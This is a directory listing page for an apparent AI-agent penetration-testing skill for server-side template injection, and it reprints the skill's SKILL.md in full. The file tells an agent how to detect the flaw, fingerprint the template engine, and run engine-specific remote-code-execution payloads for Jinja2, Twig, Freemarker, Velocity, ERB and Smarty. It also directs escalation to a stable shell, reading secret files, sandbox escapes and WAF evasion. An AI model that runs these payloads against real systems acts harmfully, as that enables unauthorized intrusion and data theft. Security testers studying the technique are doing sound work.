Agent skill

Web Ssti

by s0ld13rr in s0ld13rr/pentestcode

Server-Side Template Injection detection→engine-fingerprint→RCE for web apps.

MITAuto-check passedDocuments & Office

Install Web Ssti

skills CLI
$ npx skills add s0ld13rr/pentestcode --skill web-ssti -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install s0ld13rr/pentestcode web-ssti --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/s0ld13rr/pentestcode.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/web/ssti .claude/skills/web-ssti && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
web-ssti
GitHub stars
827
Token cost
~621 tokens
SKILL.md length
162 words
Files
1
Skills in repo
9
Repo updated
First seen
Licence
MIT

At a glance

Server-Side Template Injection detection→engine-fingerprint→RCE for web apps.

  • User input renders into a server-side template (names
  • SKILL.md covers When this fires, Detect, Decide — fingerprint the engine and Exploit → PROVE IMPACT…, plus 2 more sections
  • Instructions only: no scripts, shell commands, URLs or credentials in SKILL.md
  • Email/PDF/report generators

What it does

Web Ssti is an agent skill from s0ld13rr/pentestcode. Server-Side Template Injection detection→engine-fingerprint→RCE for web apps. Use when user input renders into a server-side template (names, greetings, email/PDF/report generators, error pages, profile fields) and math payloads evaluate. Triggers - {{77}} returns 49, ${77},

Its SKILL.md is about 620 tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.

It sits in Documents & Office, covering Backend development. The repository describes itself as: PentestCode - Multi-agent AI penetration testing system with persistent engagement state, strategic coordination, and parallel autonomous operations. The licence is MIT.

When your agent uses it

  • User input renders into a server-side template (names
  • Email/PDF/report generators
  • Profile fields) and math payloads evaluate
  • - {{77}} returns 49

Example prompts

  • “/web-ssti”

What it can do on your machine

Read from SKILL.md and the folder at commit 6053679. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    No scripts in the folder and no shell commands in SKILL.md.

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    No URLs in SKILL.md.

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Web Ssti loads about 621 tokens when it runs. Until then it costs about 72 tokens; SKILL.md has 162 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~72
When it runs · the whole SKILL.md, loaded when a task matches
~621

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check passed

The automated check found no risky patterns in SKILL.md.

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.

SKILL.md

The full file from s0ld13rr/pentestcode at commit 6053679, republished under its MIT licence (© s0ld13rr). 162 words, ~621 tokens.

Download SKILL.mdSave it as .claude/skills/web-ssti/SKILL.md (or your agent's skills folder).
name
web-ssti
description
Server-Side Template Injection detection→engine-fingerprint→RCE for web apps. Use when user input renders into a server-side template (names, greetings, email/PDF/report generators, error pages, profile fields) and math payloads evaluate. Triggers - {{7*7}} returns 49, ${7*7},
tags
vuln_assess, exploitation

Server-Side Template Injection (SSTI)

When this fires

Reflected input where a math/template payload EVALUATES server-side (not just echoes). Common sinks: name/greeting fields, email/PDF/report/invoice generators, custom error pages, admin templates.

Detect

Send the polyglot; if any arithmetic evaluates, it's SSTI (reflected ≠ executed — the value must be COMPUTED):

${7*7}  {{7*7}}  <%= 7*7 %>  #{7*7}  ${{7*7}}  @(7*7)

49/7777777 back = hit. Then fingerprint the engine to pick the RCE path.

Decide — fingerprint the engine

  • {{7*7}}=49 but {{7*'7'}} → 7777777 = Jinja2/Twig (Python/PHP); TemplateError = Jinja2.
  • ${7*7}=49 = Freemarker/Velocity (Java) or JSP EL.
  • #{7*7} = Ruby ERB / Thymeleaf / JSF.
  • <%= 7*7 %> = ERB (Ruby) / EJS (Node).
  • ${{7*7}} errors but {{7*7}} ok = Handlebars/Node.

Exploit → PROVE IMPACT (engine-specific RCE)

Jinja2:   {{cycler.__init__.__globals__.os.popen('id').read()}}
          {{self.__init__.__globals__.__builtins__.__import__('os').popen('id').read()}}
Twig:     {{['id']|filter('system')}}  /  {{_self.env.registerUndefinedFilterCallback('system')}}{{_self.env.getFilter('id')}}
Freemarker: <#assign x="freemarker.template.utility.Execute"?new()>${x("id")}
Velocity: #set($e="e");$e.getClass().forName("java.lang.Runtime").getMethod("exec",...)...("id")
ERB:      <%= `id` %>  /  <%= system('id') %>
Smarty:   {system('id')}  /  {php}system('id');{/php}

Proof required: id/uname -a output (RCE), or read a secret file. Then convert to a stable shell / record_artifact.

Tooling

tplmap -u '<url>?p=*' (auto-detect+exploit) if available; else manual per above. nuclei -tags ssti.

False positives / pitfalls

  • Client-side echo (value reflected but NOT computed) = XSS, not SSTI.
  • Sandboxed engine (Twig sandbox, Jinja2 SandboxedEnvironment) → try the sandbox-escape gadgets from PayloadsAllTheThings before concluding dead.
  • WAF stripping {{ }} → try ${}, #{}, whitespace/comment obfuscation.

© s0ld13rr, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

Just SKILL.md in skills/web/ssti of s0ld13rr/pentestcode.

Open the folder on GitHubat commit 6053679

Compare with similar skills

Web Ssti next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Web Ssti compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Web Ssti this skills0ld13rr/pentestcode827—~621Automated safety check: PassMIT
Django Access Reviewgetsentry/skills1k3 repos~2.6kAutomated safety check: NotesApache-2.0
Translateforthecraft/drf-auth-kit121—~2.4kAutomated safety check: NotesMIT
Psalm Security Analysiscachethq/core230—~4.7kAutomated safety check: PassCustom licence
Svgridsv-grid/sv-grid179—~2.4kAutomated safety check: PassCustom licence
Mica Ppocr Custom Parserlets-mica/mica-ppocr110—~3.1kAutomated safety check: PassApache-2.0

Similar skills

  • Django Access Review

    getsentry/skills

    Official

    Django access control and IDOR security review. An agent skill from getsentry/skills.

    1k GitHub starsUsed in 3 repos~2.6k tokens
    Backend & APIsAuto-check: notes
  • Translate

    forthecraft/drf-auth-kit

    Run Django translation workflow - extract untranslated strings, translate them to 59 languages using parallel translator subagents, and apply back to PO files.

    121 GitHub stars~2.4k tokensUpdated 1 mo ago
    Writing & ContentAuto-check: notes
  • Runs and interprets Psalm security (taint) analysis on a Laravel project.

    230 GitHub stars~4.7k tokensUpdated 3 days ago
    SecurityAuto-check passed
  • Svgrid

    sv-grid/sv-grid

    Writes, fixes, and reviews SvGrid data-grid code in Svelte 5 projects - columns, features, inline editing, filtering, theming with --sg- tokens, server-side data, the built-in AI helpers, and the…

    179 GitHub stars~2.4k tokensUpdated yesterday
    Documents & OfficeAuto-check passed
  • Mica Ppocr Custom Parser

    lets-mica/mica-ppocr

    在 mica-ppocr 项目中新增自定义结构化解析器(证件 / 票据 / 卡证 OCR → 业务字段)时加载本 skill。

    110 GitHub stars~3.1k tokensUpdated 7 days ago
    Backend & APIsAuto-check passed
  • Ssti

    PentesterFlow/agent

    Server-Side Template Injection — fingerprint the engine first (Jinja2 / Twig / Velocity / Freemarker / ERB / Smarty / Mako / Handlebars / Pug), then escalate the engine-specific primitive to RCE or…

    1.4k GitHub stars~1.2k tokensUpdated 1 mo ago
    SecurityAuto-check passed

More from s0ld13rr/pentestcode

All 9 skills in this repo
  • Svc Docker K8s

    s0ld13rr/pentestcode

    Docker/Kubernetes attack techniques — exposed API abuse, container escape, RBAC/privileged-pod issues, secret theft.

    827 GitHub stars~648 tokensUpdated 6 days ago
    Auto-check passed
  • Svc Mobile Android

    s0ld13rr/pentestcode

    Android APK static analysis — OWASP Mobile Top 10, Retrofit API audit, transport security, smali reading, component export, auth flow analysis.

    827 GitHub stars~2.9k tokensUpdated 6 days ago
    Auto-check passed
  • Web Lfi Traversal

    s0ld13rr/pentestcode

    Path traversal / Local File Inclusion detection→file-read→RCE for web apps.

    827 GitHub stars~602 tokensUpdated 6 days ago
    Auto-check: notes
  • Web Sqli

    s0ld13rr/pentestcode

    SQL injection detection→exploitation→proof for web apps and APIs.

    827 GitHub stars~710 tokensUpdated 6 days ago
    Auto-check passed
  • Web Xxe

    s0ld13rr/pentestcode

    XML External Entity injection detection→file-read/SSRF→proof for web apps.

    827 GitHub stars~585 tokensUpdated 6 days ago
    Auto-check passed
  • Svc Database

    s0ld13rr/pentestcode

    Database RCE paths — UDF, xpcmdshell, COPY TO PROGRAM, Redis key write.

    827 GitHub stars~379 tokensUpdated 6 days ago
    Auto-check passed

Questions about Web Ssti

What does Web Ssti do?

Server-Side Template Injection detection→engine-fingerprint→RCE for web apps. Web Ssti is an agent skill from s0ld13rr/pentestcode. Server-Side Template Injection detection→engine-fingerprint→RCE for web apps.

When should I use Web Ssti?

Web Ssti fits situations like: user input renders into a server-side template (names; email/PDF/report generators; profile fields) and math payloads evaluate; - {{77}} returns 49.

How do I install Web Ssti in Claude Code?

Run `npx skills add s0ld13rr/pentestcode --skill web-ssti -a claude-code`. Or copy the skill folder (skills/web/ssti in s0ld13rr/pentestcode) into .claude/skills/web-ssti in your project. Claude Code loads it when a task matches its description.

How do I install Web Ssti in Codex?

Run `npx skills add s0ld13rr/pentestcode --skill web-ssti -a codex`. Or copy the skill folder (skills/web/ssti in s0ld13rr/pentestcode) into .agents/skills/web-ssti in your project. Codex loads it when a task matches its description.

Can I use Web Ssti in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add s0ld13rr/pentestcode --skill web-ssti -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/web-ssti, .gemini/skills/web-ssti, .github/skills/web-ssti and .opencode/skills/web-ssti in your project.

What does Web Ssti need to run?

SKILL.md names no scripts, command-line tools or credentials: Web Ssti is instructions for the agent only.

Does Web Ssti access the network?

SKILL.md contains no URLs. Any network use would come from the scripts or tools the agent runs. This is read from the text; nothing was executed.

Is Web Ssti safe to install?

Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.

What licence does Web Ssti use?

Web Ssti is published under the MIT licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Web Ssti use?

About 621 tokens (SKILL.md is roughly 2.5k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.

What are the alternatives to Web Ssti?

Skills that share tags, products or a category with Web Ssti: Django Access Review (getsentry/skills, 1k stars), Translate (forthecraft/drf-auth-kit, 121 stars), Psalm Security Analysis (cachethq/core, 230 stars) and Svgrid (sv-grid/sv-grid, 179 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Web Ssti?

s0ld13rr (a GitHub user) maintains it in s0ld13rr/pentestcode, which has 827 GitHub stars. The repository holds 9 skills in this directory. The repository was last updated on October 2, 2026.

Source: s0ld13rr/pentestcode on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.